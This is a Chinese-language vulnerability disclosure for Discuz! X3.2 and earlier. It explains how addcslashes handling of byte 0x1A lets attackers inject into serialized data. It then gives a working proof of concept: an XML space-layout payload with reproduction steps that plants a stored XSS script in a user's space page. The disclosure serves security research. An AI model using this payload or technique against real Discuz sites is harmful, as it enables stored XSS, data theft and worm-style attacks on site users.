Discuz！的addcslashes对序列化字符串处理不当造成数据注入

### 简要描述： 首先声明一点，这个漏洞2014-09-10在“腾讯安全应急响应中心”发过，账号现已放弃，对于腾讯不想多说什么 问题描述： Discuz_X3.2及以下 可盗取管理员、用户信息，蠕虫攻击等 ### 详细说明： source\class\discuz\discuz_database.php public static function quote($str, $noarray = false) { if (is_string($str)) return '\'' . addcslashes($str, "\n\r\\'\"\032") . '\''; ..... source\function\function_core.php function dunserialize($data) { if(($ret = unserialize($data)) === false) { $ret = unserialize(stripslashes($data)); } return $ret; } “return '\'' . addcslashes($str, "\n\r\\'\"\032") . '\'';”这句会把ascii的1A转换成3个字符,分别是ascii的0H，33H，32H。 通过提交1A可以让dunserialize()函数if返回false调用“$ret = unserialize(stripslashes($data));”， 这句会将数据再次addcslashes一次，如果提交的数据中有\就会产生数据的覆盖， 比如'a:2{s:4:"key1";s:4:"\\\\";s:4:"key2";s:4:"data";}'会变成'a:2{s:4:"key1";s:4:"\\";s:4:"key2";s:4:"data";}'。 如果这两个数据都是可提交的，就可以通过提交适当的\造成注入而改写数组的值、增加数组、实例化对象等。 ### 漏洞证明： 下面个人空间的XSS 通过布局数组改写$blockdata['parameters'][$blockname]['title']参数的值绕过过滤 <?xml version="1.0" encoding="ISO-8859-1"?><root> <item id="diypage"> <item id="frame`frame1"> <item id="attr"> <item id="name"><![CDATA[frame1]]></item> <item id="moveable"><![CDATA[false]]></item> <item id="className"><![CDATA[frame cl]]></item> <item id="titles"></item></item> <item id="column`frame1_left"> <item id="attr"> <item id="name"><![CDATA[frame1_left]]></item> <item id="className"><![CDATA[z column]]></item></item> <item id="block`profile"> <item id="attr"> <item id="name"><![CDATA[profile]]></item> <item id="className"><![CDATA[block move-span]]></item> <item id="titles"> <item id="0"> <item id="text"><![CDATA[\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\]]></item> <item id="href"><![CDATA[";s:4:"href";s:0:"";s:5:"color";s:11:" ! important";s:5:"float";s:0:"";s:6:"margin";s:0:"";s:9:"font- size";s:0:"";s:9:"className";s:0:"";s:3:"src";s:0:"";}s:9:"className";a:1:{i:0;s:16:"blocktitle title";} s:5:"style";s:0:"";}}}s:11:"block`album";a:1:{s:4:"attr";a:3:{s:4:"name";s:5:"album";s:9:"className";s:15:"block move-span";s:6:"titles";a:3:{i:0;a:8:{s:4:"text";s:4:"相册";s:4:"href";s:0:"";s:5:"color";s:11:" ! important";s:5:"float";s:0:"";s:6:"margin";s:0:"";s:9:"font- size";s:0:"";s:9:"className";s:0:"";s:3:"src";s:0:"";}s:9:"className";a:1:{i:0;s:16:"blocktitle title";} s:5:"style";s:0:"";}}}}s:20:"column`frame1_center";a:1:{s:4:"attr";a:2: {s:4:"name";s:13:"frame1_center";s:9:"className";s:8:"z column";}}s:19:"column`frame1_right";a:1:{s:4:"attr";a:2: {s:4:"name";s:12:"frame1_right";s:9:"className";s:8:"z column";}}}} s:13:"currentlayout";s:5:"1:2:1";s:10:"parameters";a:2:{s:7:"profile";a:2:{s:5:"title";s:30:"<script>alert ("xss");</script>";s:9:"banavatar";s:6:"middle";}s:5:"album";a:2:{s:5:"title";s:4:"相册";s:7:"shownum";i:8;}}}]] ></item> <item id="color"><![CDATA[ !important]]></item> <item id="float"><![CDATA[]]></item> <item id="margin"><![CDATA[]]></item> <item id="font-size"><![CDATA[]]></item> <item id="className"><![CDATA[]]></item> <item id="src"><![CDATA[]]></item></item> <item id="className"> <item id="0"><![CDATA[blocktitle title]]></item></item> <item id="style"></item></item></item></item> <item id="block`album"> <item id="attr"> <item id="name"><![CDATA[album]]></item> <item id="className"><![CDATA[block move-span]]></item> <item id="titles"> <item id="0"> <item id="text"><![CDATA[相册]]></item> <item id="href"><![CDATA[http://]]></item> <item id="color"><![CDATA[ !important]]></item> <item id="float"><![CDATA[]]></item> <item id="margin"><![CDATA[]]></item> <item id="font-size"><![CDATA[]]></item> <item id="className"><![CDATA[]]></item> <item id="src"><![CDATA[]]></item></item> <item id="className"> <item id="0"><![CDATA[blocktitle title]]></item></item> <item id="style"></item></item></item></item></item> <item id="column`frame1_center"> <item id="attr"> <item id="name"><![CDATA[frame1_center]]></item> <item id="className"><![CDATA[z column]]></item></item></item> <item id="column`frame1_right"> <item id="attr"> <item id="name"><![CDATA[frame1_right]]></item> <item id="className"><![CDATA[z column]]></item></item></item></item></item></root> home.php?mod=spacecp&ac=index 1. urlencode编码xml布局修改layoutdata，post提交 2. 空间首页，装扮空间，编辑相册，模块名称，ascii“1A5c5c5c”（引号中的）确定 3. 再次编辑，确定（不用修改） 最后保存空间 [<img src="https://images.seebug.org/upload/201409/131019039bea24aeed24012061169efeeea29ac9.jpg" alt="图片1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/131019039bea24aeed24012061169efeeea29ac9.jpg) [<img src="https://images.seebug.org/upload/201409/1310193020955534f941371e0ab9f08201917066.jpg" alt="图片2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/1310193020955534f941371e0ab9f08201917066.jpg) [<img src="https://images.seebug.org/upload/201409/13101944bf1a3f37dd0d0ec15847c37c89f10e46.jpg" alt="图片3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/13101944bf1a3f37dd0d0ec15847c37c89f10e46.jpg) [<img src="https://images.seebug.org/upload/201409/131019587d8ff92deeec5bf5d536731c8d7c2b90.jpg" alt="图片4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/131019587d8ff92deeec5bf5d536731c8d7c2b90.jpg)